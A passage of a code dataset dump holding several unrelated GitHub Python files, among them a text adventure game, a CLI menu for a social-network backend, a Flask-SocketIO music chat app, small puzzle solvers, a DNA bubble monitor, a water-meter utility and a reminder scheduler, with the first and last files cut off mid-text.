if not ask again \n if (String == \"in your inventory\" and Cheese == \"not in your inventory\"):\n while ((Attic_option < OPTION_1 or Attic_option > OPTION_2) and Attic_option != OPTION_4): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2 or 4\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory and cheese is too user can only input 1-4 if not ask again \n if (String == \"in your inventory\" and Cheese == \"in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_4): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-4\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is not in your inventory and no cheese user can only input 1-2 if not ask again \n if (String != \"in your inventory\" and Cheese == \"not in your inventory\"):\n while (Attic_option < OPTION_1 or Attic_option > OPTION_2): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2\")\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n return Attic_option # return Attic_option to living room\n\n\n#Creating a function that makes the attic\n#Attic(str,str,str)\ndef Attic(String,Cheese,Mouse):\n while True:\n AtticInfo(String,Cheese)\n Attic_option = int(input(\"What would you like to do?\"))\n Attic_option = AtticInputCheck(Attic_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If user input is 1 go back to the living room\n if (Attic_option == OPTION_1):\n print(\"\\n\")\n return String, Cheese, Mouse; # using a tuple to return three values to Living Room\n\n#If user input is 2 pick up the cheese \n if (Attic_option == OPTION_2):\n print(\"You picked up the cheese\")\n Cheese = \"in your inventory\"\n\n#If user input is 3 try to drop cheese into the hole \n if (Attic_option == OPTION_3):\n print(\"The cheese is too big\")\n\n#If user input is 4 drop the string down the hole \n if (Attic_option == OPTION_4):\n print(\"You dropped the string down the hole\")\n String = \"gone\"\n Mouse = \"out\"\n\n\n#Creating a function that tells the bedroom description\n#BedroomInfo(str,str,str)\ndef BedroomInfo(String,Cheese,Mouse):\n\n#If mouse is hiding giving description of the bedroom\n if (Mouse == \"hiding\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the\nbed with a mouse hiding in it and a tomcat watching the hole trying to get\nthe mouse.Behind you is a dark entranceway back to the living room.\"\"\",\"\\n\")\n\n#If mouse is out giving a description of the bedroom\n if (Mouse == \"out\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the bed\nand next to it is a mouse wondering in the room.Behind you is a dark entranceway\nback to the living room.\"\"\",\"\\n\")\n\n#If mouse is gone giving a desscription of the bedroom\n if (Mouse == \"gone\"):\n print(\"\"\"Room: Bedroom\n-------------\"\"\",\"\\n\")\n print(\"\"\"You're currently in the bedroom in front of you is a small hole next to the bed.\nIt seems like the mouse has wondered off somewhere.Behind you is a dark\nentranceway back to the living room.\"\"\",\"\\n\")\n\n print(\"The string is currently\",String)\n print(\"The cheese is currently\",Cheese)\n print(\"The mouse is currently\",Mouse)\n print(\"Type '1' to go back to the living room \")\n if (String == \"in your inventory\"): #If string is in your inventory give option 2\n print(\"Type '2' to use the string to play with the cat\")\n if (Cheese == \"in your inventory\") and (Mouse == \"out\"): #If cheese in your inventory and mouse out give option 3\n print(\"Type '3' to feed the mouse the cheese\")\n\n\n#Creating a function that checks the bedroom input\n#BedroomInputCheck(int,str,str,str)\ndef BedroomInputCheck(Bedroom_option,String,Cheese,Mouse):\n\n#Input check if string is not in your inventory user can only input 1 if not then ask again\n if (String == \"not in your inventory\" and Cheese == \"in your inventory\") or (String == \"not in your inventory\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_1): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-1\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone and cheese is not in your inventory user can only input 1 if not ask again\n if (String == \"gone\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_1): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-1\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is in your inventory user can only input 1-2 if not then ask again \n if (String == \"in your inventory\" and Cheese == \"in your inventory\") or (String == \"in your inventory\" and Cheese == \"not in your inventory\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option > OPTION_2): # If input is not valid ask again\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1-2\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n\n#Input check if string is gone and cheese in inventory user can only input 1 or 3 if not then ask again\n if (String == \"gone\" and Cheese == \"in your inventory\" and Mouse == \"out\"):\n while (Bedroom_option < OPTION_1 or Bedroom_option >= OPTION_2 and Bedroom_option != OPTION_3):\n print(\"\\n\")\n print(\"That option doesn't exist please choose from options 1 or 3\")\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n return Bedroom_option #Return user input to Bedroom \n\n\n#Creating a function that makes the bedroom\n#Bedroom(str,str,str)\ndef Bedroom(String,Cheese,Mouse):\n while True:\n BedroomInfo(String,Cheese,Mouse)\n Bedroom_option = int(input(\"What would you like to do?\"))\n Bedroom_option = BedroomInputCheck(Bedroom_option,String,Cheese,Mouse)\n print(\"\\n\")\n\n#If user input is 1 go back to living room \n if (Bedroom_option == OPTION_1):\n print(\"\\n\")\n return String, Cheese , Mouse; # using a tuple to return two values\n\n#If user input is 2 try to distract the cat \n if (Bedroom_option == OPTION_2):\n print(\"The cat looks at you briefly then goes back to watching the hole\")\n\n#If user input is 3 feed the mouse \n if (Bedroom_option == OPTION_3):\n print(\"You fed the cheese to the mouse and he wondered off somewhere\")\n Mouse = \"gone\"\n Cheese = \"not in your inventory\"\n \n\n#Creating the start function\n#start(no parameter)\ndef start():\n Dial = \"nothing\"\n Lever = \"nothing\"\n String = \"not in your inventory\"\n Cheese = \"not in your inventory\"\n Mouse = \"hiding\"\n print(\"The door that brought you to this house has disappeared, find another way out!\")\n EntranceRoom(Dial,Lever)\n LivingRoom(String,Cheese,Mouse)\n\n#calling the start function\nstart()\n","repo_name":"navjeethundal/TextAdventureGame","sub_path":"TextAdventureGame.py","file_name":"TextAdventureGame.py","file_ext":"py","file_size_in_byte":20739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25340509315","text":"\"\"\"\nProvides a basic frontend\n\"\"\"\nimport sys\nimport main\n\nfrom loguru import logger\n\nlogger.remove()\nlogger.add('loguru_file_{time:YYYY-MM-DD}.log', level='DEBUG')\nlogger.add(sys.stderr, level='WARNING')\n\n\ndef load_accounts_csv_to_db(uc_instance):\n \"\"\"\n Loads user accounts from a file\n \"\"\"\n filename = input('Enter filename of user file: ')\n main.load_accounts_csv_to_db(filename, uc_instance)\n\n\ndef load_status_csv_to_db(sc_instance):\n \"\"\"\n Loads status updates from a file\n \"\"\"\n filename = input('Enter filename for status file: ')\n main.load_status_csv_to_db(filename, sc_instance)\n\n\ndef add_user(uc_instance):\n \"\"\"\n Adds a new user into the database\n \"\"\"\n user_id = input('User ID: ')\n email = input('User email: ')\n user_name = input('User name: ')\n user_last_name = input('User last name: ')\n logger.info(f\"Calling add_user with user_id\")\n logger.debug(f\"add_user parameter user_id: {user_id}\")\n if not main.add_user(user_id,\n email,\n user_name,\n user_last_name,\n uc_instance):\n logger.error(\"An error occurred while trying to add new user\")\n print(\"An error occurred while trying to add new user\")\n else:\n logger.debug(\"User was successfully added\")\n print(\"User was successfully added\")\n\n\ndef delete_user(uc_instance):\n \"\"\"\n Deletes user from the database\n \"\"\"\n user_id = input(\"Enter the user_id of the user to delete: \")\n if not main.delete_user(user_id, uc_instance):\n logger.debug(f'{user_id} does not exist')\n print(f\"Failed to remove {user_id}. Does not exist!\")\n else:\n logger.debug(f'{user_id} deleted')\n print(f\"Removed {user_id}\")\n\n\ndef search_user(uc_instance):\n \"\"\"\n Searches a user in the database\n \"\"\"\n user_id = input('Enter user ID to search: ')\n result = main.search_user(user_id, uc_instance)\n logger.debug(result)\n if result is None:\n logger.error(\"ERROR: User does not exist\")\n print(\"ERROR: User does not exist\")\n else:\n logger.debug(f\"User ID: {result.user_id}\")\n print(f\"User ID: {result.user_id}\")\n logger.debug(f\"Email: {result.email}\")\n print(f\"Email: {result.email}\")\n logger.debug(f\"Name: {result.user_name}\")\n print(f\"Name: {result.user_name}\")\n logger.debug(f\"Last name: {result.user_last_name}\")\n print(f\"Last name: {result.user_last_name}\")\n\n\ndef update_email(uc_instance):\n \"\"\"\n Updates information for an existing user\n \"\"\"\n user_id = input(\"Enter the user_id of the user whose information you wish to update: \")\n email = input(\"Enter their new email address: \")\n if not main.update_email(user_id, email, uc_instance):\n logger.error(\"An error occurred while trying to update user email\")\n print(f\"Failed to update to {email}\")\n else:\n logger.debug(\"User email was successfully updated\")\n print(f\"{user_id}'s new email is now {email}\")\n\n\ndef add_status(sc_instance):\n \"\"\"\n Adds a new status into the database\n \"\"\"\n user_id = input('User ID: ')\n status_id = input('Status ID: ')\n status_text = input('Status text: ')\n if not main.add_status(status_id, user_id, status_text, sc_instance):\n logger.error(\"An error occurred while trying to add new status\")\n print(\"An error occurred while trying to add new status\")\n else:\n logger.debug(\"New status was successfully added\")\n print(\"New status was successfully added\")\n\n\ndef delete_status(sc_instance):\n \"\"\"\n Deletes status from the database\n \"\"\"\n status_id = input(\"Enter the status_id of the status to delete: \")\n if not main.delete_status(status_id, sc_instance):\n logger.error(\"An error occurred while trying to delete status\")\n print(\"An error occurred while trying to delete status\")\n else:\n logger.debug(\"Status was successfully deleted\")\n print(\"Status was successfully deleted\")\n\n\ndef search_status(sc_instance):\n \"\"\"\n Searches a status in the database\n \"\"\"\n status_id = input(\"Enter a status_id to search for status: \")\n status = main.search_status(status_id, sc_instance)\n if status is not None:\n # return status.status_id, status.user_id, status.status_text\n print(\n f\"{status.status_id} from {status.user_id} has status(es): {status.status_text}.\"\n )\n else:\n logger.error(\"ERROR: Status does not exist\")\n print(f\"{status_id} was not found\")\n\n\ndef update_status(sc_instance):\n \"\"\"\n Updates information for an existing status\n \"\"\"\n status_id = input(\"Enter the status_id of the status you wish to update: \")\n status_text = input(\"Enter a new status text: \")\n result = main.update_status(status_id, status_text, sc_instance)\n if result:\n print(f\"{status_id}'s new status is now {status_text}\")\n logger.error(\"An error occurred while trying to update status\")\n else:\n print(f\"Failed to update to {status_id}\")\n logger.debug(\"Status was successfully updated\")\n\n\ndef quit_program():\n \"\"\"\n Quits program\n \"\"\"\n sys.exit()\n\n\nif __name__ == \"__main__\":\n user_collection_instance = main.init_user_collection()\n status_collection_instance = main.init_status_collection()\n while True:\n user_input = input(\n '1. Add user\\n2. Search user\\n3. Delete user\\n4. Update email\\n'\n '5. Add status\\n6. Search status\\n7. Delete status\\n8. Update status text\\n'\n '9. Load user data to database\\n10. Load status data to database\\n11. Exit\\nEnter option: ')\n if user_input == \"1\":\n add_user(user_collection_instance)\n elif user_input == \"2\":\n search_user(user_collection_instance)\n elif user_input == \"3\":\n delete_user(user_collection_instance)\n elif user_input == \"4\":\n update_email(user_collection_instance)\n elif user_input == \"5\":\n add_status(status_collection_instance)\n elif user_input == \"6\":\n search_status(status_collection_instance)\n elif user_input == \"7\":\n delete_status(status_collection_instance)\n elif user_input == \"8\":\n update_status(status_collection_instance)\n elif user_input == \"9\":\n load_accounts_csv_to_db( user_collection_instance)\n elif user_input == \"10\":\n load_status_csv_to_db(status_collection_instance)\n elif user_input == \"11\":\n sys.exit(0)\n else:\n print(\"Did not understand input\")","repo_name":"audreyle/social-network-backend-sqlite","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73226839899","text":"from flask_cors import CORS\nfrom flask import Flask, render_template, request, redirect, url_for, session\nfrom flask_socketio import SocketIO, join_room, leave_room, emit\nimport os\n\nfrom datetime import datetime\nfrom dotenv import load_dotenv\nfrom pathlib import Path # Python 3.6+ only\n\nenv_path = Path('.') / '.env'\nload_dotenv(dotenv_path=env_path)\n\napp = Flask(__name__)\nsocket = SocketIO(app, manage_session=False, cors_allowed_origins=\"*\")\napp.debug = True\n\napp.config['SECRET_KEY'] = 'secret'\nCORS(app)\n\n\n@app.route(\"/\")\ndef index():\n if 'username' in session:\n return redirect(url_for(\"chat\"))\n return render_template(\"index.html\")\n\n\n@app.route(\"/chat\", methods=['GET', 'POST'])\ndef chat():\n if request.method == 'POST':\n username, room = request.form[\"username\"], request.form[\"room\"]\n session[\"username\"] = username\n session[\"room\"] = room\n return render_template(\"chat.html\", session=session, clientID=str(os.getenv('CLIENT_ID')))\n else:\n # check if user login\n if \"username\" in session:\n return render_template(\"chat.html\", session=session)\n else:\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/leave\", methods=['GET', 'POST'])\ndef leave():\n session.clear()\n return redirect(url_for(\"index\"))\n\n\n@socket.on('join', namespace='/chat')\ndef join(message):\n name = session['username']\n room = session['room']\n time = datetime.now()\n\n join_room(room)\n emit('status', {\"username\": name, \"content\": \"has joined\", \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('message', namespace='/chat')\ndef send_msg(message):\n name = session['username']\n room = session['room']\n time = datetime.now()\n content = message['content']\n\n if content == \"\":\n return\n # broadcast to everyone in the room of new message\n emit('message', {\"username\": name, \"content\": content, \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('leave', namespace='/chat')\ndef leave(message):\n room = session['room']\n name = session['username']\n time = datetime.now()\n\n # cannot clear session here. dk why\n leave_room(room)\n emit('status', {\"username\": name, \"content\": \"has left\", \"time\": parseTime(time)}, room=room)\n\n\n@socket.on('play_music', namespace='/chat')\ndef play_music(info):\n room = session['room']\n name = session['username']\n print(\"broadcast music\")\n emit('play_music', {\"id\" : info['id']}, room=room)\n\n content = f\"'s just played {info['track_name']}\"\n time = datetime.now()\n\n emit('status', {\"username\": name, \"content\": content, \"time\": parseTime(time)}, room=room)\n\n\ndef parseTime(obj):\n obj = str(obj)\n date = obj.split(\" \")[0]\n time = \":\".join(obj.split(\" \")[-1].split(\":\")[:-1])\n return f\"{time} {date}\"\n\n\nif __name__ == '__main__':\n socket.run(app, host='0.0.0.0')\n","repo_name":"leminhviett/Music-Chat-App","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28854542391","text":"\"\"\"\n파일 이름 : 1100.py\n제작자 : 정지운\n제작 날짜 : 2017년 6월 18일\n프로그램 용도 : 체스판의 하얀 칸 위에 말이 몇 개 있는지 출력한다.\n\"\"\"\n\n# 입력\ninputLst = []\nfor i in range(8):\n\tinputLst.append(input())\n\n# 계산\nnum = 0\nfor i in range(len(inputLst)):\n\tfor j in range(len(inputLst[i])):\n\t\t# 인덱스 값의 합이 짝수이면 하얀 칸이라는 것을 이용한다.\n\t\tif ((i + j) % 2 == 0) and inputLst[i][j] == 'F':\n\t\t\tnum += 1\n\n# 결과 출력\nprint(num)","repo_name":"programmer-k/Baekjoon-Online-Judge-Submission","sub_path":"1100.py","file_name":"1100.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13366251380","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 14 17:48:24 2022\r\n\r\n@author: Goran\r\n\"\"\"\r\nimport math\r\nimport random\r\n\r\ndef input_an_integer():\r\n return int(input('Please input an integer:'))\r\n\r\ndef test_if_prime(x):\r\n \r\n if x<3:\r\n return True\r\n elif x%2==0:\r\n return False\r\n elif x<=7:\r\n return True\r\n else:\r\n for i in range(3,math.floor(x/2.0),2):\r\n if x%i==0:\r\n return False\r\n \r\n return True\r\n\r\nlist_size = int(input('How long is the list of integers\\n'))\r\n \r\nlist_min = int(input('What is the smallest possible random integer?\\n'))\r\nlist_max = int(input('What is the largest possible random integer?\\n'))\r\n\r\na = [random.randint(list_min, list_max) for x in range(1,list_size)]\r\n\r\nprint('We have generated the following list:\\n', a, '\\n')\r\n\r\nprimes = set([x for x in a if test_if_prime(x)])\r\n\r\nprint('The following numbers of this list are primes:\\n', [x for x in primes])\r\n\r\n \r\n ","repo_name":"GoranSimatovic/Python-lookup","sub_path":"test_list_for_primes.py","file_name":"test_list_for_primes.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43318610399","text":"from pydna_epbd.monitors.monitor import Monitor\n\n\nclass BubbleMonitor(Monitor):\n \"\"\"The bubble monitor collects DNA bubbles for each bp at different thresholds.\n For a threshold, if a bps distance is more than the threshold, it computes the\n bubble length starting from that bp until the next bps distance is less\n than the threshold. In this implementation, the minimum and maximum bubble length are\n considered in between 3 and 20, inclusive. The number of thresholds are set to 20 by\n default from 0.5 Angstrom to 10.5 Angstrom with step size 0.5 Angstrom.\n \"\"\"\n\n TRESHOLDS = [i / 10 for i in range(5, 105, 5)] # start=.5, end=10.5, step.5\n TRESHOLD_SIZE = len(TRESHOLDS)\n MIN_BUB_ELEM, MAX_BUB_ELEM = 3, 20\n\n def __init__(self, dna) -> None:\n \"\"\"Initialize BubbleMonitor object.\n\n Args:\n dna (DNA): A DNA object.\n \"\"\"\n super(BubbleMonitor, self).__init__(dna)\n self.bubbles = [\n [[0] * self.TRESHOLD_SIZE for _ in range(self.MAX_BUB_ELEM)]\n for _ in range(self.dna.n_nt_bases)\n ] # shape=(n_nt_bases, MAX_BUB_ELEM, TRESHOLD_SIZE)\n\n def collect_at_step(self, step_no):\n \"\"\"Collects bubbles at every post-preheating steps.\n\n Args:\n step_no (int): Step number.\n \"\"\"\n # bubbles are collected at every temperature\n for base_idx in range(self.dna.n_nt_bases): # for each base\n for tr_idx in range(self.TRESHOLD_SIZE): # for each threshold\n R = 0\n p = base_idx\n tr = self.TRESHOLDS[tr_idx]\n while self.dna.coords_dist[p] >= tr and R + 1 < self.dna.n_nt_bases:\n R += 1\n p = base_idx + R\n if p >= self.dna.n_nt_bases:\n p = p - self.dna.n_nt_bases # - 1\n if R >= self.MIN_BUB_ELEM:\n length = min(R, self.MAX_BUB_ELEM - 1)\n self.bubbles[base_idx][length][tr_idx] += 1\n if R == 0:\n break\n","repo_name":"lanl/pyDNA_EPBD","sub_path":"pydna_epbd/monitors/bubble_monitor.py","file_name":"bubble_monitor.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"42350786125","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import Counter\n\n# Complete the anagram function below.\ndef anagram(s):\n l = len(s)\n if l%2:return -1\n half = Counter(s[l//2:])\n exchange = 0\n for v,k in Counter(s[:l//2]).items():\n if k != half[v]: exchange+=max(0, k-half[v])\n return exchange\n \nif __name__ == '__main__':\n fptr = sys.stdout\n\n q = int(input())\n\n for q_itr in range(q):\n s = input()\n\n result = anagram(s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()","repo_name":"kopyshev/HackerRankCheckIO","sub_path":"HackerRank/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23881515128","text":"\"\"\"\nParameters and run script for Section 4.2.3\n\"\"\"\n\n\nimport numpy as np\nimport porepy as pp\n\nfrom common_models import Poromechanics, solid_values\nfrom grids import horizontal_fracture_3d\nfrom utility_functions import run_simulation_pairs_varying_parameters\n\nif __name__ == \"__main__\":\n nc = 15\n\n solid_values.update(\n {\n \"permeability\": 1e-5,\n \"biot_coefficient\": 0.2,\n \"residual_aperture\": 1e-1,\n }\n )\n solid = pp.SolidConstants(solid_values)\n fluid = pp.FluidConstants({\"compressibility\": 1e-3})\n params = {\n \"use_tpfa\": True,\n \"time_manager\": pp.TimeManager(\n schedule=[0, 1e5], dt_init=1e5, constant_dt=True\n ),\n \"plotting_file_name\": \"biot_fracture\",\n \"file_name\": \"biot_fracture\",\n \"folder_name\": \"biot_fracture\",\n \"grid_method\": horizontal_fracture_3d,\n \"mesh_args\": np.array([nc, nc, nc - 1]),\n \"nl_convergence_tol\": 1e-12,\n \"material_constants\": {\"solid\": solid, \"fluid\": fluid},\n }\n k = 1e1\n update_params = {\n \"10\": {\"legend_title\": r\"Source [$m^3/s$]\", \"fluid_source_value\": k},\n \"20\": {\"fluid_source_value\": 2 * k},\n \"30\": {\"fluid_source_value\": 3 * k},\n \"40\": {\"fluid_source_value\": 4 * k},\n }\n\n run_simulation_pairs_varying_parameters(params, update_params, Poromechanics)\n h = 1\n","repo_name":"keileg/differentiable_mpfa","sub_path":"run_biot_fracture.py","file_name":"run_biot_fracture.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7410822667","text":"#!/usr/bin/env python\n#\n# double precision dft subroutine\n# xaratustrah\n# 2016\n#\n\n#import cmath\nimport math\nimport numpy as np\n\n\ndef dft(x):\n xre = [s.real for s in x]\n xim = [s.imag for s in x]\n\n n = len(xre)\n y = [complex(0, 0)] * n\n \n for k in range(n): # For each output element\n sumreal = 0.0\n sumimag = 0.0\n for t in range(n): # For each input element\n angle = 2 * math.pi * t * k / n\n sumreal += xre[t] * math.cos(angle) + xim[t] * math.sin(angle)\n sumimag += -xre[t] * math.sin(angle) + xim[t] * math.cos(angle)\n y[k] = complex(sumreal, sumimag)\n return y\n\n\n# ----------------------------\n\ndef main():\n x = [complex(1, 2), complex(2, 3), complex(3, 4), complex(4, 5)]\n y = dft(x)\n print('In:')\n print(x)\n print('Out:')\n print(y)\n print(np.fft.fft(x))\n\nif __name__ == '__main__':\n main()\n","repo_name":"xaratustrah/dft","sub_path":"py_dft.py","file_name":"py_dft.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19878910733","text":"import os\nimport pandas as pd\nfrom datetime import datetime\nfrom binascii import hexlify as hex2str\nfrom binascii import unhexlify as str2hex\nfrom struct import unpack\n\nread_command = str2hex('107BFD7816')\n\ndef flip(address):\n if type(address) == list:\n result = list()\n \n for addr in address:\n addr = addr[6:8] + addr[4:6] + addr[2:4] + addr[0:2]\n result.append(addr)\n \n return result\n \n else:\n return address[6:8] + address[4:6] + address[2:4] + address[0:2]\n\ndef crc(address):\n return ('%x' %sum(str2hex('73FD52' + address + 'FFFFFFFF')))[-2:]\n\ndef to_select_command(inverted_address):\n if type(inverted_address) == list:\n result = list()\n for address in inverted_address:\n result.append(str2hex('680B0B6873FD52' + address + 'FFFFFFFF' + crc(address) + '16'))\n \n return result\n \n else:\n return str2hex('680B0B6873FD52' + inverted_address + 'FFFFFFFF' + crc(inverted_address) + '16')\n\ndef current_time():\n return datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\ndef to_csv(path, file_name, save_data): \n df = pd.DataFrame([save_data], columns=['datetime', 'address', 'flow_rate', 'total_volume'])\n \n if not os.path.exists(path + file_name):\n df.to_csv(path + file_name, index=False, mode='w', encoding='utf-8-sig')\n \n else:\n df.to_csv(path + file_name, index=False, mode='a', encoding='utf-8-sig', header=False)\n\n\ndef read_format(hex_data, from_start, to_end):\n read_data = hex_data[from_start:to_end]\n read_data = hex2str(read_data)\n read_data = str(read_data)[2:-1]\n return read_data\n\ndef get_return_address(str_data):\n return_address = flip(str_data)\n return return_address\n\ndef get_flow_rate(str_data):\n flow_rate = flip(str_data)\n flow_rate = str2hex(flow_rate)\n flow_rate = unpack('!f', flow_rate)[0]\n \n return flow_rate\n\ndef get_total_volume(str_data):\n total_volume = flip(str_data)\n total_volume = int(total_volume, 16) / 1000\n return total_volume","repo_name":"heee3018/WaterCare","sub_path":"WaterCare_t/drivers/lxc_util.py","file_name":"lxc_util.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"26493069400","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File : Scheduler.py\n# @Author: Administrator\n# @Date : 2019/12/11\nfrom schedule.MongoDBUtil import MongoDBUtil\nimport logging\nimport time\nimport uuid\nfrom msg_consumer.SentConsumer import sent_queue_msg, build_queue_msg\nfrom schedule.Scheduler import scheduler, TRIGGER_INTERVAL, TRIGGER_DATE, TRIGGER_CRON\nfrom schedule.WorkDay import is_workday, is_holiday\nfrom datetime import datetime, timedelta\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef if_workday(msg):\n type_ = msg[\"workday\"]\n workday = is_workday(datetime.today())\n if type_ == 0:\n return True\n else:\n if workday and type_ == 1:\n return True\n if not workday and type_ == 2:\n return True\n return False\n\n\ndef remind_text_job(msg):\n if if_workday(msg):\n print('do remind_text_job ' + time.asctime() + ',' + str(msg))\n message = str(msg[\"do_what\"]) + str(msg[\"tail\"])\n sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\n# 可以考虑先放到一个队列中多个消费者处理 或者 采用缓存 每隔几个小时更新\ndef remind_weather_job(msg):\n if if_workday(msg):\n print('do remind_weather_job ' + time.asctime() + ',' + str(msg))\n city_message = str(msg[\"v1\"])\n weather = get_sojson_weather(city_message)\n if weather:\n message = weather + str(msg[\"tail\"])\n sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\ndef news_job(msg):\n if if_workday(msg):\n print('do news_job ' + time.asctime() + ',' + str(msg))\n news_type = msg[\"v1\"]\n if news_type == NewsChannel['新闻'].value:\n new_msg = TianSimpleNews().reply_text()\n else:\n new_msg = TianNew().reply_text(10, news_type)\n if new_msg:\n message = new_msg + str(msg[\"tail\"])\n sent_queue_msg(build_queue_msg(str(msg[\"to_user\"]), message))\n\n\nclass RemindScheduler:\n\n def __init__(self):\n self.job_id = ''\n self.job_msg_type = 0\n self.job_time = ''\n self.job_repeat = {}\n self.trigger_repeat = ''\n self.job_msg = ''\n self.user_wxid = ''\n self.user_say = ''\n self.v1 = ''\n self.v2 = ''\n # private\n self.job_corn = {}\n pass\n\n def add_job(self, job_msg_type, job_time, job_repeat, job_msg, user_wxid, user_say, v1, v2):\n self.job_msg_type = job_msg_type\n self.job_time = job_time\n self.job_repeat = job_repeat\n self.job_msg = job_msg\n self.user_wxid = user_wxid\n self.user_say = user_say\n self.v1 = v1\n self.v2 = v2\n # 校验最大条数\n num = MongoDBUtil().user_all_num(self.user_wxid)\n if num >= 15:\n return -2\n\n # 处理job\n if all([self.job_time, self.job_msg, self.user_wxid]):\n # 生成一个job id\n self.job_id = str(uuid.uuid1()).replace(\"-\", '')\n try:\n if self.job_repeat:\n # 重复\n self.parse_repeat_time()\n scheduler.add_job(self.get_job_function(), self.trigger_repeat, **self.job_corn,\n args=[self.job_msg], id=self.job_id, start_date=self.job_time)\n else:\n # 单次\n scheduler.add_job(self.get_job_function(), TRIGGER_DATE, run_date=self.job_time,\n args=[self.job_msg], id=self.job_id)\n\n self.add_mongodb(self.job_id)\n return 0\n except Exception as e:\n logging.info(':( add job exception:', e)\n self.add_mongodb(-1)\n return -1\n\n def add_mongodb(self, mongo_job_id):\n # 当添加任务失败的时候填-1\n if self.user_wxid:\n # user_id + job_id + time + remark\n mongodb_dic = {'user_id': self.user_wxid, 'job_id': mongo_job_id, 'remark': self.user_say}\n MongoDBUtil().insert(mongodb_dic)\n return -1\n\n def get_job_function(self):\n if self.job_msg_type == 0:\n return remind_text_job\n elif self.job_msg_type == 1:\n return remind_weather_job\n elif self.job_msg_type == 3:\n return news_job\n\n def parse_repeat_time(self):\n year_s, mon_s, day_s = self.job_time.split(' ')[0].split('-')\n hour_s, minute_s, second_s = self.job_time.split(' ')[1].split(':')\n job_corn_dict = {'year': year_s, 'month': mon_s, 'day': day_s, 'hour': hour_s,\n 'minute': minute_s, 'second': second_s}\n if self.job_repeat:\n for key in self.job_repeat:\n if self.job_repeat[key] != 1:\n self.job_corn = self.job_repeat\n self.trigger_repeat = TRIGGER_INTERVAL\n return\n\n if REPEAT_KEY_YEAR in self.job_repeat:\n year_interval = self.job_repeat.get(REPEAT_KEY_YEAR)\n update_dict = {'year': '*/' + str(year_interval)}\n elif REPEAT_KEY_MONTH in self.job_repeat:\n month_interval = self.job_repeat.get(REPEAT_KEY_MONTH)\n del job_corn_dict['year']\n update_dict = {'month': '*/' + str(month_interval)}\n elif REPEAT_KEY_WEEK in self.job_repeat:\n week_interval = self.job_repeat.get(REPEAT_KEY_WEEK)\n del job_corn_dict['year']\n del job_corn_dict['month']\n update_dict = {'week': '*/' + str(week_interval)}\n elif REPEAT_KEY_DAY in self.job_repeat:\n day_interval = self.job_repeat.get(REPEAT_KEY_DAY)\n del job_corn_dict['year']\n del job_corn_dict['month']\n update_dict = {'day': '*/' + str(day_interval)}\n elif REPEAT_KEY_HOUR in self.job_repeat:\n hour_interval = self.job_repeat.get(REPEAT_KEY_HOUR)\n del job_corn_dict['year']\n del job_corn_dict['month']\n del 